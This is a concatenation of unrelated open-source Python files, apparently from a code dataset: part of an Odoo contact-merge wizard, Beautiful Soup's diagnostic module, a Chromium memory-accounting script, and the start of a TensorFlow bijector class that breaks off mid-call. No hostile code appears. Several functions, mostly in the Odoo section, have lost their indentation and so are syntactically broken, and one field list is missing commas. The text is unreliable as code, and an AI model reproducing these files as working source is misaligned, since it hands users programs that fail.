            update_records('marketing.campaign.workitem', src=partner, field_model='object_id.model')
            update_records('ir.model.data', src=partner)
        # Now handle every declared 'reference'-typed field in the database.
        proxy = self.pool['ir.model.fields']
        domain = [('ttype', '=', 'reference')]
        record_ids = proxy.search(cr, openerp.SUPERUSER_ID, domain, context=context)
        for record in proxy.browse(cr, openerp.SUPERUSER_ID, record_ids, context=context):
            try:
                proxy_model = self.pool[record.model]
                column = proxy_model._columns[record.name]
            except KeyError:
                # unknown model or field => skip
                continue
            if isinstance(column, fields.function):
                # computed fields have no stored value to rewrite
                continue
            for partner in src_partners:
                domain = [
                    (record.name, '=', 'res.partner,%d' % partner.id)
                ]
                model_ids = proxy_model.search(cr, openerp.SUPERUSER_ID, domain, context=context)
                values = {
                    record.name: 'res.partner,%d' % dst_partner.id,
                }
                proxy_model.write(cr, openerp.SUPERUSER_ID, model_ids, values, context=context)
    def _update_values(self, cr, uid, src_partners, dst_partner, context=None):
        """
        Copy scalar/many2one column values from the source partners onto the
        destination. Partners are scanned in order with ``dst_partner`` last,
        so for each column the destination's own non-empty value wins, then
        the later sources. ``parent_id`` is written separately and skipped if
        it would create a recursive hierarchy.
        """
        _logger.debug('_update_values for dst_partner: %s for src_partners: %r', dst_partner.id, list(map(operator.attrgetter('id'), src_partners)))
        columns = dst_partner._columns
        def write_serializer(column, item):
            # browse records must be written as their database id
            if isinstance(item, browse_record):
                return item.id
            else:
                return item
        values = dict()
        # x2many and function fields are handled elsewhere / not copied
        for column, field in columns.iteritems():
            if field._type not in ('many2many', 'one2many') and not isinstance(field, fields.function):
                for item in itertools.chain(src_partners, [dst_partner]):
                    if item[column]:
                        values[column] = write_serializer(column, item[column])
        values.pop('id', None)
        parent_id = values.pop('parent_id', None)
        dst_partner.write(values)
        if parent_id and parent_id != dst_partner.id:
            try:
                dst_partner.write({'parent_id': parent_id})
            except ValidationError:
                _logger.info('Skip recursive partner hierarchies for parent_id %s of partner: %s', parent_id, dst_partner.id)
    @mute_logger('openerp.osv.expression', 'openerp.models')
    def _merge(self, cr, uid, partner_ids, dst_partner=None, context=None):
        """
        Merge ``partner_ids`` into a single partner: repoint FKs, reference
        fields and values onto the destination, then unlink the sources.

        Safety rules: at most 3 partners per call; non-admin users may only
        merge partners sharing one email and none of the sources may be
        linked to existing Journal Items. If ``dst_partner`` is not one of
        ``partner_ids``, the destination is the last of _get_ordered_partner.
        """
        proxy = self.pool.get('res.partner')
        # drop ids that no longer exist in the database
        partner_ids = proxy.exists(cr, uid, list(partner_ids), context=context)
        if len(partner_ids) < 2:
            return
        if len(partner_ids) > 3:
            raise UserError(_("For safety reasons, you cannot merge more than 3 contacts together. You can re-open the wizard several times if needed."))
        if openerp.SUPERUSER_ID != uid and len(set(partner.email for partner in proxy.browse(cr, uid, partner_ids, context=context))) > 1:
            raise UserError(_("All contacts must have the same email. Only the Administrator can merge contacts with different emails."))
        if dst_partner and dst_partner.id in partner_ids:
            src_partners = proxy.browse(cr, uid, [id for id in partner_ids if id != dst_partner.id], context=context)
        else:
            ordered_partners = self._get_ordered_partner(cr, uid, partner_ids, context)
            dst_partner = ordered_partners[-1]
            src_partners = ordered_partners[:-1]
        _logger.info("dst_partner: %s", dst_partner.id)
        if openerp.SUPERUSER_ID != uid and self._model_is_installed(cr, uid, 'account.move.line', context=context) and \
                self.pool.get('account.move.line').search(cr, openerp.SUPERUSER_ID, [('partner_id', 'in', [partner.id for partner in src_partners])], context=context):
            raise UserError(_("Only the destination contact may be linked to existing Journal Items. Please ask the Administrator if you need to merge several contacts linked to existing Journal Items."))
        call_it = lambda function: function(cr, uid, src_partners, dst_partner,
                                            context=context)
        call_it(self._update_foreign_keys)
        call_it(self._update_reference_fields)
        call_it(self._update_values)
        _logger.info('(uid = %s) merged the partners %r with %s', uid, list(map(operator.attrgetter('id'), src_partners)), dst_partner.id)
        dst_partner.message_post(body='%s %s'%(_("Merged with the following partners:"), ", ".join('%s<%s>(ID %s)' % (p.name, p.email or 'n/a', p.id) for p in src_partners)))
        for partner in src_partners:
            partner.unlink()
def clean_emails(self, cr, uid, context=None):
"""
Clean the email address of the partner, if there is an email field with
a mimum of two addresses, the system will create a new partner, with the
information of the previous one and will copy the new cleaned email into
the email field.
"""
context = dict(context or {})
proxy_model = self.pool['ir.model.fields']
field_ids = proxy_model.search(cr, uid, [('model', '=', 'res.partner'),
('ttype', 'like', '%2many')],
context=context)
fields = proxy_model.read(cr, uid, field_ids, context=context)
reset_fields = dict((field['name'], []) for field in fields)
proxy_partner = self.pool['res.partner']
context['active_test'] = False
ids = proxy_partner.search(cr, uid, [], context=context)
fields = ['name', 'var' 'partner_id' 'is_company', 'email']
partners = proxy_partner.read(cr, uid, ids, fields, context=context)
partners.sort(key=operator.itemgetter('id'))
partners_len = len(partners)
_logger.info('partner_len: %r', partners_len)
for idx, partner in enumerate(partners):
if not partner['email']:
continue
percent = (idx / float(partners_len)) * 100.0
_logger.info('idx: %r', idx)
_logger.info('percent: %r', percent)
try:
emails = sanitize_email(partner['email'])
head, tail = emails[:1], emails[1:]
email = head[0] if head else False
proxy_partner.write(cr, uid, [partner['id']],
{'email': email}, context=context)
for email in tail:
values = dict(reset_fields, email=email)
proxy_partner.copy(cr, uid, partner['id'], values,
context=context)
except Exception:
_logger.exception("There is a problem with this partner: %r", partner)
raise
return True
def close_cb(self, cr, uid, ids, context=None):
return {'type': 'ir.actions.act_window_close'}
def _generate_query(self, fields, maximum_group=100):
sql_fields = []
for field in fields:
if field in ['email', 'name']:
sql_fields.append('lower(%s)' % field)
elif field in ['vat']:
sql_fields.append("replace(%s, ' ', '')" % field)
else:
sql_fields.append(field)
group_fields = ', '.join(sql_fields)
filters = []
for field in fields:
if field in ['email', 'name', 'vat']:
filters.append((field, 'IS NOT', 'NULL'))
criteria = ' AND '.join('%s %s %s' % (field, operator, value)
for field, operator, value in filters)
text = [
"SELECT min(id), array_agg(id)",
"FROM res_partner",
]
if criteria:
text.append('WHERE %s' % criteria)
text.extend([
"GROUP BY %s" % group_fields,
"HAVING COUNT(*) >= 2",
"ORDER BY min(id)",
])
if maximum_group:
text.extend([
"LIMIT %s" % maximum_group,
])
return ' '.join(text)
    def _compute_selected_groupby(self, this):
        """
        Return the list of field names whose 'group_by_<field>' checkbox is
        enabled on the wizard record ``this``; raise a UserError when none
        are selected.
        """
        group_by_str = 'group_by_'
        group_by_len = len(group_by_str)
        # all candidate fields, derived from the wizard's own column names
        fields = [
            key[group_by_len:]
            for key in self._columns.keys()
            if key.startswith(group_by_str)
        ]
        groups = [
            field
            for field in fields
            if getattr(this, '%s%s' % (group_by_str, field), False)
        ]
        if not groups:
            raise UserError(_("You have to specify a filter for your selection"))
        return groups
    def next_cb(self, cr, uid, ids, context=None):
        """
        Skip the current group without merging anything: drop the current
        wizard line and advance to the next screen.
        """
        context = dict(context or {}, active_test=False)
        this = self.browse(cr, uid, ids[0], context=context)
        if this.current_line_id:
            this.current_line_id.unlink()
        return self._next_screen(cr, uid, this, context)
    def _get_ordered_partner(self, cr, uid, partner_ids, context=None):
        """
        Return browse records ordered primarily by ``active`` (True first)
        and, within each group, by ``create_date`` descending. Callers pick
        the LAST element as the merge destination.
        """
        partners = self.pool.get('res.partner').browse(cr, uid, list(partner_ids), context=context)
        # two stable sorts: inner by create_date desc, outer by active desc
        ordered_partners = sorted(sorted(partners,
                                         key=operator.attrgetter('create_date'), reverse=True),
                                  key=operator.attrgetter('active'), reverse=True)
        return ordered_partners
    def _next_screen(self, cr, uid, this, context=None):
        """
        Advance the wizard: load the next duplicate-group line into the form
        (state 'selection'), or mark the wizard 'finished' when no lines
        remain, and return the act_window to redisplay the wizard.
        """
        this.refresh()
        values = {}
        if this.line_ids:
            # in this case, we try to find the next record.
            current_line = this.line_ids[0]
            # aggr_ids is stored as text; parse it back into a list of ids
            current_partner_ids = literal_eval(current_line.aggr_ids)
            values.update({
                'current_line_id': current_line.id,
                'partner_ids': [(6, 0, current_partner_ids)],
                'dst_partner_id': self._get_ordered_partner(cr, uid, current_partner_ids, context)[-1].id,
                'state': 'selection',
            })
        else:
            values.update({
                'current_line_id': False,
                'partner_ids': [],
                'state': 'finished',
            })
        this.write(values)
        return {
            'type': 'ir.actions.act_window',
            'res_model': this._name,
            'res_id': this.id,
            'view_mode': 'form',
            'target': 'new',
        }
def _model_is_installed(self, cr, uid, model, context=None):
proxy = self.pool.get('ir.model')
domain = [('model', '=', model)]
return proxy.search_count(cr, uid, domain, context=context) > 0
def _partner_use_in(self, cr, uid, aggr_ids, models, context=None):
"""
Check if there is no occurence of this group of partner in the selected
model
"""
for model, field in models.iteritems():
proxy = self.pool.get(model)
domain = [(field, 'in', aggr_ids)]
if proxy.search_count(cr, uid, domain, context=context):
return True
return False
    def compute_models(self, cr, uid, ids, context=None):
        """
        Compute the models used to exclude partner groups, based on the
        wizard's 'exclude_*' checkboxes: a mapping of model name -> name of
        its partner field, consumed by _partner_use_in().
        """
        assert is_integer_list(ids)
        this = self.browse(cr, uid, ids[0], context=context)
        models = {}
        if this.exclude_contact:
            models['res.users'] = 'partner_id'
        # journal items only matter when the accounting module is installed
        if self._model_is_installed(cr, uid, 'account.move.line', context=context) and this.exclude_journal_item:
            models['account.move.line'] = 'partner_id'
        return models
    def _process_query(self, cr, uid, ids, query, context=None):
        """
        Execute the duplicate-finding SELECT and store one wizard line per
        retained group; groups touching any excluded model (compute_models)
        are skipped. Updates the wizard's state and group counter.
        """
        proxy = self.pool.get('base.partner.merge.line')
        this = self.browse(cr, uid, ids[0], context=context)
        models = self.compute_models(cr, uid, ids, context=context)
        cr.execute(query)
        counter = 0
        for min_id, aggr_ids in cr.fetchall():
            if models and self._partner_use_in(cr, uid, aggr_ids, models, context=context):
                continue
            values = {
                'wizard_id': this.id,
                'min_id': min_id,
                'aggr_ids': aggr_ids,
            }
            proxy.create(cr, uid, values, context=context)
            counter += 1
        values = {
            'state': 'selection',
            'number_group': counter,
        }
        this.write(values)
        _logger.info("counter: %s", counter)
    def start_process_cb(self, cr, uid, ids, context=None):
        """
        Start the process.
        * Compute the selected groups (with duplication)
        * If the user has selected the 'exclude_XXX' fields, avoid the partners.
        Returns the act_window for the first group screen.
        """
        assert is_integer_list(ids)
        # inactive partners must be considered too
        context = dict(context or {}, active_test=False)
        this = self.browse(cr, uid, ids[0], context=context)
        groups = self._compute_selected_groupby(this)
        query = self._generate_query(groups, this.maximum_group)
        self._process_query(cr, uid, ids, query, context=context)
        return self._next_screen(cr, uid, this, context)
    def automatic_process_cb(self, cr, uid, ids, context=None):
        """
        Run the full process without user interaction: compute the duplicate
        groups, then merge every group in turn, committing after each one so
        an error cannot roll back earlier merges.
        """
        assert is_integer_list(ids)
        this = self.browse(cr, uid, ids[0], context=context)
        this.start_process_cb()
        this.refresh()
        for line in this.line_ids:
            partner_ids = literal_eval(line.aggr_ids)
            self._merge(cr, uid, partner_ids, context=context)
            line.unlink()
            # commit per group: partial progress survives a later failure
            cr.commit()
        this.write({'state': 'finished'})
        return {
            'type': 'ir.actions.act_window',
            'res_model': this._name,
            'res_id': this.id,
            'view_mode': 'form',
            'target': 'new',
        }
    def parent_migration_process_cb(self, cr, uid, ids, context=None):
        """
        Find and merge partners duplicated across a parent/child link (same
        email and name, with one being the other's parent), then clear
        self-referencing parent_ids left behind.
        """
        assert is_integer_list(ids)
        context = dict(context or {}, active_test=False)
        this = self.browse(cr, uid, ids[0], context=context)
        # groups of partners sharing email+name where one is the other's parent
        query = """
            SELECT
                min(p1.id),
                array_agg(DISTINCT p1.id)
            FROM
                res_partner as p1
            INNER join
                res_partner as p2
            ON
                p1.email = p2.email AND
                p1.name = p2.name AND
                (p1.parent_id = p2.id OR p1.id = p2.parent_id)
            WHERE
                p2.id IS NOT NULL
            GROUP BY
                p1.email,
                p1.name,
                CASE WHEN p1.parent_id = p2.id THEN p2.id
                    ELSE p1.id
                END
            HAVING COUNT(*) >= 2
            ORDER BY
                min(p1.id)
        """
        self._process_query(cr, uid, ids, query, context=context)
        for line in this.line_ids:
            partner_ids = literal_eval(line.aggr_ids)
            self._merge(cr, uid, partner_ids, context=context)
            line.unlink()
            cr.commit()
        this.write({'state': 'finished'})
        # a merge can leave a partner as its own parent; reset those rows
        cr.execute("""
            UPDATE
                res_partner
            SET
                is_company = NULL,
                parent_id = NULL
            WHERE
                parent_id = id
        """)
        return {
            'type': 'ir.actions.act_window',
            'res_model': this._name,
            'res_id': this.id,
            'view_mode': 'form',
            'target': 'new',
        }
def update_all_process_cb(self, cr, uid, ids, context=None):
assert is_integer_list(ids)
# WITH RECURSIVE cycle(id, parent_id) AS (
# SELECT id, parent_id FROM res_partner
# UNION
# SELECT cycle.id, res_partner.parent_id
# FROM res_partner, cycle
# WHERE res_partner.id = cycle.parent_id AND
# cycle.id != cycle.parent_id
# )
# UPDATE res_partner
# SET parent_id = NULL
# WHERE id in (SELECT id FROM cycle WHERE id = parent_id);
this = self.browse(cr, uid, ids[0], context=context)
self.parent_migration_process_cb(cr, uid, ids, context=None)
list_merge = [
{'group_by_vat': True, 'group_by_email': True, 'group_by_name': True},
# {'group_by_name': True, 'group_by_is_company': True, 'group_by_parent_id': True},
# {'group_by_email': True, 'group_by_is_company': True, 'group_by_parent_id': True},
# {'group_by_name': True, 'group_by_vat': True, 'group_by_is_company': True, 'exclude_journal_item': True},
# {'group_by_email': True, 'group_by_vat': True, 'group_by_is_company': True, 'exclude_journal_item': True},
# {'group_by_email': True, 'group_by_is_company': True, 'exclude_contact': True, 'exclude_journal_item': True},
# {'group_by_name': True, 'group_by_is_company': True, 'exclude_contact': True, 'exclude_journal_item': True}
]
for merge_value in list_merge:
id = self.create(cr, uid, merge_value, context=context)
self.automatic_process_cb(cr, uid, [id], context=context)
cr.execute("""
UPDATE
res_partner
SET
is_company = NULL
WHERE
parent_id IS NOT NULL AND
is_company IS NOT NULL
""")
# cr.execute("""
# UPDATE
# res_partner as p1
# SET
# is_company = NULL,
# parent_id = (
# SELECT p2.id
# FROM res_partner as p2
# WHERE p2.email = p1.email AND
# p2.parent_id != p2.id
# LIMIT 1
# )
# WHERE
# p1.parent_id = p1.id
# """)
return self._next_screen(cr, uid, this, context)
    def merge_cb(self, cr, uid, ids, context=None):
        """
        Merge the partners currently selected on the wizard into the chosen
        destination, then advance to the next group screen; with nothing
        selected the wizard jumps straight to 'finished'.
        """
        assert is_integer_list(ids)
        context = dict(context or {}, active_test=False)
        this = self.browse(cr, uid, ids[0], context=context)
        partner_ids = set(map(int, this.partner_ids))
        if not partner_ids:
            this.write({'state': 'finished'})
            return {
                'type': 'ir.actions.act_window',
                'res_model': this._name,
                'res_id': this.id,
                'view_mode': 'form',
                'target': 'new',
            }
        self._merge(cr, uid, partner_ids, this.dst_partner_id, context=context)
        if this.current_line_id:
            this.current_line_id.unlink()
        return self._next_screen(cr, uid, this, context)
    def auto_set_parent_id(self, cr, uid, ids, context=None):
        """
        For each graded partner (ordered by invoice count), attach every
        other partner sharing its email domain as a child — unless more than
        one partner of that domain already has invoices, in which case the
        domain is skipped. '@gmail.com' is pre-excluded as a public domain.
        """
        assert is_integer_list(ids)
        # select partner who have one least invoice
        partner_treated = ['@gmail.com']
        cr.execute("""  SELECT p.id, p.email
                        FROM res_partner as p
                        LEFT JOIN account_invoice as a
                        ON p.id = a.partner_id AND a.state in ('open','paid')
                        WHERE p.grade_id is NOT NULL
                        GROUP BY p.id
                        ORDER BY COUNT(a.id) DESC
                """)
        # strip the local part, keeping '@domain' only
        re_email = re.compile(r".*@")
        for id, email in cr.fetchall():
            # check email domain
            email = re_email.sub("@", email or "")
            if not email or email in partner_treated:
                continue
            partner_treated.append(email)
            # don't update the partners if they are more of one who have invoice
            cr.execute("""  SELECT *
                            FROM res_partner as p
                            WHERE p.id != %s AND p.email LIKE %s AND
                                EXISTS (SELECT * FROM account_invoice as a WHERE p.id = a.partner_id AND a.state in ('open','paid'))
                    """, (id, '%' + email))
            if len(cr.fetchall()) > 1:
                _logger.info("%s MORE OF ONE COMPANY", email)
                continue
            # to display changed values
            cr.execute("""  SELECT id,email
                            FROM res_partner
                            WHERE parent_id != %s AND id != %s AND email LIKE %s
                    """, (id, id, '%' + email))
            _logger.info("%r", cr.fetchall())
            # upgrade
            cr.execute(""" UPDATE res_partner
                            SET parent_id = %s
                            WHERE id != %s AND email LIKE %s
                    """, (id, id, '%' + email))
        return False
| gpl-3.0 |
MarkWh1te/xueqiu_predict | p3_env/lib/python3.5/site-packages/bs4/diagnose.py | 23 | 6773 | """Diagnostic functions, mainly for use when doing tech support."""
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
__license__ = "MIT"
import cProfile
from io import StringIO
from html.parser import HTMLParser
import bs4
from bs4 import BeautifulSoup, __version__
from bs4.builder import builder_registry
import os
import pstats
import random
import tempfile
import time
import traceback
import sys
import cProfile
def diagnose(data):
    """Diagnostic suite for isolating common problems.

    :param data: A string containing markup, a filename, a URL, or a
        file-like object.  Filenames are read; URLs only produce a hint,
        since Beautiful Soup is not an HTTP client.

    Prints which parsers are installed and what each of them makes of
    the given markup.
    """
    print("Diagnostic running on Beautiful Soup %s" % __version__)
    print("Python version %s" % sys.version)

    basic_parsers = ["html.parser", "html5lib", "lxml"]
    # Iterate over a copy: removing an element from the list being
    # iterated would make the loop silently skip the following parser.
    for name in list(basic_parsers):
        for builder in builder_registry.builders:
            if name in builder.features:
                break
        else:
            basic_parsers.remove(name)
            print((
                "I noticed that %s is not installed. Installing it may help." %
                name))

    if 'lxml' in basic_parsers:
        # Also exercise lxml's XML mode.
        basic_parsers.append(["lxml", "xml"])
        try:
            from lxml import etree
            print("Found lxml version %s" % ".".join(map(str,etree.LXML_VERSION)))
        except ImportError as e:
            print (
                "lxml is not installed or couldn't be imported.")

    if 'html5lib' in basic_parsers:
        try:
            import html5lib
            print("Found html5lib version %s" % html5lib.__version__)
        except ImportError as e:
            print (
                "html5lib is not installed or couldn't be imported.")

    # Normalize `data` into a markup string.
    if hasattr(data, 'read'):
        data = data.read()
    elif os.path.exists(data):
        print('"%s" looks like a filename. Reading data from the file.' % data)
        with open(data) as fp:
            data = fp.read()
    elif data.startswith("http:") or data.startswith("https:"):
        print('"%s" looks like a URL. Beautiful Soup is not an HTTP client.' % data)
        print("You need to use some other library to get the document behind the URL, and feed that document to Beautiful Soup.")
        return
    print()

    # Try every available parser and show what each produced.
    for parser in basic_parsers:
        print("Trying to parse your markup with %s" % parser)
        success = False
        try:
            soup = BeautifulSoup(data, parser)
            success = True
        except Exception as e:
            print("%s could not parse the markup." % parser)
            traceback.print_exc()
        if success:
            print("Here's what %s did with the markup:" % parser)
            print(soup.prettify())

        print("-" * 80)
def lxml_trace(data, html=True, **kwargs):
    """Print out the lxml events that occur during parsing.

    This lets you see how lxml parses a document when no Beautiful
    Soup code is running.
    """
    from lxml import etree
    events = etree.iterparse(StringIO(data), html=html, **kwargs)
    for event, element in events:
        print("%s, %4s, %s" % (event, element.tag, element.text))
class AnnouncingParser(HTMLParser):
    """Announces HTMLParser parse events, without doing anything else."""

    def _p(self, s):
        # Single output helper so every handler reports events uniformly.
        print(s)

    def handle_starttag(self, name, attrs):
        self._p("%s START" % name)

    def handle_endtag(self, name):
        self._p("%s END" % name)

    def handle_data(self, data):
        self._p("%s DATA" % data)

    def handle_charref(self, name):
        self._p("%s CHARREF" % name)

    def handle_entityref(self, name):
        self._p("%s ENTITYREF" % name)

    def handle_comment(self, data):
        self._p("%s COMMENT" % data)

    def handle_decl(self, data):
        self._p("%s DECL" % data)

    def unknown_decl(self, data):
        self._p("%s UNKNOWN-DECL" % data)

    def handle_pi(self, data):
        self._p("%s PI" % data)
def htmlparser_trace(data):
    """Print out the HTMLParser events that occur during parsing.

    This lets you see how HTMLParser parses a document when no
    Beautiful Soup code is running.
    """
    AnnouncingParser().feed(data)
_vowels = "aeiou"
_consonants = "bcdfghjklmnpqrstvwxyz"

def rword(length=5):
    "Generate a random word-like string."
    # Alternate consonant/vowel, starting with a consonant.
    pools = (_consonants, _vowels)
    return ''.join(random.choice(pools[i % 2]) for i in range(length))
def rsentence(length=4):
    "Generate a random sentence-like string."
    words = (rword(random.randint(4, 9)) for _ in range(length))
    return " ".join(words)
def rdoc(num_elements=1000):
    """Randomly generate an invalid HTML document."""
    tag_names = ['p', 'div', 'span', 'i', 'b', 'script', 'table']
    elements = []
    for _ in range(num_elements):
        choice = random.randint(0, 3)
        if choice == 0:
            # New tag.
            elements.append("<%s>" % random.choice(tag_names))
        elif choice == 1:
            # Some random text.
            elements.append(rsentence(random.randint(1, 4)))
        elif choice == 2:
            # Close a tag.
            elements.append("</%s>" % random.choice(tag_names))
        # choice == 3 deliberately emits nothing.
    return "<html>" + "\n".join(elements) + "</html>"
def benchmark_parsers(num_elements=100000):
    """Very basic head-to-head performance benchmark."""
    # Times BeautifulSoup with each tree builder, then the raw lxml and
    # html5lib parsers for comparison, all on the same random document.
    print("Comparative parser benchmark on Beautiful Soup %s" % __version__)
    data = rdoc(num_elements)
    print("Generated a large invalid HTML document (%d bytes)." % len(data))

    for parser in ["lxml", ["lxml", "html"], "html5lib", "html.parser"]:
        success = False
        try:
            a = time.time()
            soup = BeautifulSoup(data, parser)
            b = time.time()
            success = True
        except Exception as e:
            print("%s could not parse the markup." % parser)
            traceback.print_exc()
        if success:
            print("BS4+%s parsed the markup in %.2fs." % (parser, b-a))

    # Baseline: lxml on its own, without the Beautiful Soup tree builder.
    from lxml import etree
    a = time.time()
    etree.HTML(data)
    b = time.time()
    print("Raw lxml parsed the markup in %.2fs." % (b-a))

    # Baseline: html5lib on its own.
    import html5lib
    parser = html5lib.HTMLParser()
    a = time.time()
    parser.parse(data)
    b = time.time()
    print("Raw html5lib parsed the markup in %.2fs." % (b-a))
def profile(num_elements=100000, parser="lxml"):
    """Profile a BeautifulSoup parse of a large random document and print
    the cumulative-time hot spots."""
    filehandle = tempfile.NamedTemporaryFile()
    filename = filehandle.name

    data = rdoc(num_elements)
    # `namespace` serves as both globals and locals for the profiled code.
    namespace = dict(bs4=bs4, data=data, parser=parser)
    cProfile.runctx('bs4.BeautifulSoup(data, parser)', namespace, namespace,
                    filename)

    stats = pstats.Stats(filename)
    # stats.strip_dirs()
    stats.sort_stats("cumulative")
    stats.print_stats('_html5lib|bs4', 50)
if __name__ == '__main__':
diagnose(sys.stdin.read())
| mit |
sgraham/nope | tools/multi_process_rss.py | 128 | 3646 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Counts a resident set size (RSS) of multiple processes without double-counts.
# If they share the same page frame, the page frame is counted only once.
#
# Usage:
# ./multi-process-rss.py <pid>|<pid>r [...]
#
# If <pid> has 'r' at the end, all descendants of the process are accounted.
#
# Example:
# ./multi-process-rss.py 12345 23456r
#
# The command line above counts the RSS of 1) process 12345, 2) process 23456
# and 3) all descendant processes of process 23456.
import collections
import logging
import os
import psutil
import sys
if sys.platform.startswith('linux'):
_TOOLS_PATH = os.path.dirname(os.path.abspath(__file__))
_TOOLS_LINUX_PATH = os.path.join(_TOOLS_PATH, 'linux')
sys.path.append(_TOOLS_LINUX_PATH)
import procfs # pylint: disable=F0401
class _NullHandler(logging.Handler):
    # Swallows log records so importing this module does not trigger
    # "No handlers could be found" warnings before main() configures logging.
    def emit(self, record):
        pass
_LOGGER = logging.getLogger('multi-process-rss')
_LOGGER.addHandler(_NullHandler())
def _recursive_get_children(pid):
    """Returns a flat, depth-first list of all descendant PIDs of |pid|.

    A vanished process yields an empty list rather than an error.
    NOTE(review): uses the legacy psutil API (get_children, psutil.error);
    modern psutil spells these Process.children() / psutil.NoSuchProcess.
    """
    try:
        children = psutil.Process(pid).get_children()
    except psutil.error.NoSuchProcess:
        return []
    descendant = []
    for child in children:
        descendant.append(child.pid)
        descendant.extend(_recursive_get_children(child.pid))
    return descendant
def list_pids(argv):
    """Parses command-line arguments into a de-duplicated list of PIDs.

    An argument ending in 'r' also pulls in all descendants of that PID.
    Raises SyntaxError when an argument is not an integer.
    """
    pids = []
    for arg in argv[1:]:
        recursive = arg.endswith('r')
        number_part = arg[:-1] if recursive else arg
        try:
            pid = int(number_part)
        except ValueError:
            raise SyntaxError("%s is not an integer." % arg)
        pids.append(pid)
        if recursive:
            pids.extend(_recursive_get_children(pid))
    pids = sorted(set(pids), key=pids.index)  # uniq: maybe slow, but simple.
    return pids
def count_pageframes(pids):
    """Maps each physical page frame number to how many times it is mapped
    across all the given processes (so shared frames can be deduplicated).
    """
    pageframes = collections.defaultdict(int)
    pagemap_dct = {}
    # First pass: load the pagemap of every readable process.
    for pid in pids:
        maps = procfs.ProcMaps.load(pid)
        if not maps:
            _LOGGER.warning('/proc/%d/maps not found.' % pid)
            continue
        pagemap = procfs.ProcPagemap.load(pid, maps)
        if not pagemap:
            _LOGGER.warning('/proc/%d/pagemap not found.' % pid)
            continue
        pagemap_dct[pid] = pagemap
    # Second pass: tally frame usage.  (Python 2 dict iteration; this
    # script predates Python 3 support.)
    for pid, pagemap in pagemap_dct.iteritems():
        for vma in pagemap.vma_internals.itervalues():
            for pageframe, number in vma.pageframes.iteritems():
                pageframes[pageframe] += number
    return pageframes
def count_statm(pids):
    """Sums (resident, shared, private) page counts over |pids| from
    /proc/<pid>/statm, skipping processes that have vanished."""
    resident = shared = private = 0
    for pid in pids:
        statm = procfs.ProcStatm.load(pid)
        if not statm:
            _LOGGER.warning('/proc/%d/statm not found.' % pid)
            continue
        resident += statm.resident
        shared += statm.share
        # Private pages are whatever is resident but not shared.
        private += statm.resident - statm.share
    return (resident, shared, private)
def main(argv):
    # Route WARNING-and-above messages to stderr with timestamps.
    logging_handler = logging.StreamHandler()
    logging_handler.setLevel(logging.WARNING)
    logging_handler.setFormatter(logging.Formatter(
        '%(asctime)s:%(name)s:%(levelname)s:%(message)s'))

    _LOGGER.setLevel(logging.WARNING)
    _LOGGER.addHandler(logging_handler)

    if sys.platform.startswith('linux'):
        logging.getLogger('procfs').setLevel(logging.WARNING)
        logging.getLogger('procfs').addHandler(logging_handler)
        pids = list_pids(argv)
        pageframes = count_pageframes(pids)
    else:
        # /proc-based accounting only exists on Linux.
        _LOGGER.error('%s is not supported.' % sys.platform)
        return 1

    # TODO(dmikurube): Classify this total RSS.
    # One count per distinct page frame; assumes 4 KiB pages.
    # (Python 2 print statement -- this script is Python 2 only.)
    print len(pageframes) * 4096

    return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause |
benoitsteiner/tensorflow-opencl | tensorflow/contrib/distributions/python/ops/bijectors/absolute_value_impl.py | 12 | 4575 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""AbsoluteValue bijector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import bijector
__all__ = [
"AbsoluteValue",
]
class AbsoluteValue(bijector.Bijector):
  """Computes `Y = g(X) = Abs(X)`, element-wise.

  This non-injective bijector allows for transformations of scalar distributions
  with the absolute value function, which maps `(-inf, inf)` to `[0, inf)`.

  * For `y in (0, inf)`, `AbsoluteValue.inverse(y)` returns the set inverse
    `{x in (-inf, inf) : |x| = y}` as a tuple, `-y, y`.
  * `AbsoluteValue.inverse(0)` returns `0, 0`, which is not the set inverse
    (the set inverse is the singleton `{0}`), but "works" in conjunction with
    `TransformedDistribution` to produce a left semi-continuous pdf.
  * For `y < 0`, `AbsoluteValue.inverse(y)` happily returns the
    wrong thing, `-y, y`.  This is done for efficiency.  If
    `validate_args == True`, `y < 0` will raise an exception.

  ```python
  abs = ds.bijectors.AbsoluteValue()

  abs.forward([-1., 0., 1.])
  ==> [1., 0., 1.]

  abs.inverse(1.)
  ==> [-1., 1.]

  # The |dX/dY| is constant, == 1.  So Log|dX/dY| == 0.
  abs.inverse_log_det_jacobian(1.)
  ==> [0., 0.]

  # Special case handling of 0.
  abs.inverse(0.)
  ==> [0., 0.]

  abs.inverse_log_det_jacobian(0.)
  ==> [0., 0.]
  ```

  """

  def __init__(self, event_ndims=0, validate_args=False, name="absolute_value"):
    """Instantiates the `AbsoluteValue` bijector.

    Args:
      event_ndims: Python scalar indicating the number of dimensions associated
        with a particular draw from the distribution.  Currently only zero is
        supported.
      validate_args: Python `bool` indicating whether arguments should be
        checked for correctness, in particular whether inputs to `inverse` and
        `inverse_log_det_jacobian` are non-negative.
      name: Python `str` name given to ops managed by this object.

    Raises:
      ValueError: If `event_ndims` is not zero.
    """
    self._graph_parents = []
    self._name = name

    event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims")
    event_ndims_const = tensor_util.constant_value(event_ndims)
    if event_ndims_const is not None and event_ndims_const not in (0,):
      raise ValueError("event_ndims(%s) was not 0" % event_ndims_const)
    else:
      # event_ndims is not statically known (or is 0): defer the check to a
      # runtime assertion when validation is requested.
      if validate_args:
        event_ndims = control_flow_ops.with_dependencies(
            [check_ops.assert_equal(
                event_ndims, 0, message="event_ndims was not 0")],
            event_ndims)

    with self._name_scope("init"):
      super(AbsoluteValue, self).__init__(
          event_ndims=event_ndims,
